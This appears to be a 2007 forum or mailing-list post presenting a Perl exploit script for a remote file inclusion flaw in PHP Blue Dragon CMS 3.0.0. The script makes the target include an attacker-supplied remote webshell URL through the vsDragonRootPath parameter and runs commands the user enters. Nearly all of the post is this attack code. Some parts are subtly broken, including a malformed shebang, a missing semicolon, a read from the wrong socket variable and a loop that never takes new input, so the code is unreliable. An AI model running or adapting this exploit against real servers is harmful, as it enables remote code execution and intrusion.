#
# egs-fuckphpbluedragon300.pl
#
# * Copyright 2007 Emanuele Gentili <bathym (at) 0x656d67 (dot) org [email concealed]>
# *
# * www.emanuele-gentili.com
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2 of the License, or
# * (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# *
#
# README:
#
# PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
# http://phpbluedragon.pl
#
Hash: SHA1
Exploit is attached.
E.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFGwRXDmErIuzAYjw8RApkJAKCkxFrH2XmwTS37D0B8BmaFe47EkwCgs5Uc
6XtVfkHyqOVv51uylzwT3WQ=
=49Nv
-----END PGP SIGNATURE-----
#!usr/bin/perl
#
# egs-fuckphpbluedragon300.pl
#
# * Copyright 2007 Emanuele Gentili <bathym (at) 0x656d67 (dot) org [email concealed]>
# *
# * www.emanuele-gentili.com
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2 of the License, or
# * (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# *
#
# README:
#
# PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
# http://phpbluedragon.pl
#
use IO::Socket
print "\n [+] Insert Hostname: ";
chomp ($host=<STDIN>);
print "\n [+] Insert webserver port (example: 80): ";
chomp (${port}=<STDIN>);
print "\n [+] Insert path: (example: /public_includes/pub_blocks/): ";
chomp (${path}=<STDIN>);
print "\n [+] Command to execute: ";
chomp (${cmd}=<STDIN>);
print "\n [+] Insert webshell address: ";
chomp (${shell}=<STDIN>);
while(${cmd} !~ "QUIT") {
${sock} = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"${host}", PeerPort=>"${port}")
or die " [+] Connecting ... Can't connect to host.\n\n";
print $sock "GET $path"."activecontent.php?vsDragonRootPath="."${shell}"."?cmd="."${cmd}"
."? HTTP/1.1\r\n";
print $sock "Host: ${host}\r\n";
print $sock "User-Agent: EG Security\n";
print $sock "Accept: */*\r\n";
print $sock "Connection: close\r\n\n";
while (${answer} = <${socket}>)
{
print "${answer}";
}
}
[ reply ]